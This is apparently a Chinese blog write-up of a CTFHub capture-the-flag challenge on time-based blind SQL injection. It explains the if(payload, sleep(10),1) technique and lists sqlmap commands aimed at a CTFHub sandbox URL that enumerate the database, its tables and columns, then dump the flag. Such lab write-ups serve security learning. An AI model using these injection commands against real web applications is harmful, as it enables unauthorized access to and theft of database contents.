锐客网

  1. 首页 > it技术 > >

CTFHUB-WEB-SQL注入-时间盲注

时间盲注手工注入时,可根据程序执行时间判断是否执行成功。
使用的函数:
if(payload, sleep(10),1) 如果payload成功,程序暂停10秒,否则立即执行
题目: CTFHUB-WEB-SQL注入-时间盲注
文章图片

靶机环境:输入1不会显现信息,也不会提示错误
CTFHUB-WEB-SQL注入-时间盲注
文章图片

使用sqlmap工具进行注入: 【CTFHUB-WEB-SQL注入-时间盲注】获取数据库名:
Sqlmap –u http://challenge-a72828618ce90b15.sandbox.ctfhub.com:10080/?id=1 –dbs
CTFHUB-WEB-SQL注入-时间盲注
文章图片

获取表名:
Sqlmap –u http://challenge-a72828618ce90b15.sandbox.ctfhub.com:10080/?id=1 –D sqli –tables
获取列名:
Sqlmap –u http://challenge-a72828618ce90b15.sandbox.ctfhub.com:10080/?id=1 –D sqli –T flag –columns
获取字段值
Sqlmap –u http://challenge-a72828618ce90b15.sandbox.ctfhub.com:10080/?id=1 –D sqli –T flag –C flag --dump
CTFHUB-WEB-SQL注入-时间盲注
文章图片

    推荐阅读


    上一篇:有了它,再也不用担心年终总结PPT!附200M模板下载(一)

    下一篇:laravel|php laravel+jq实现滚动到底部进行数据加载,延时加载,懒加载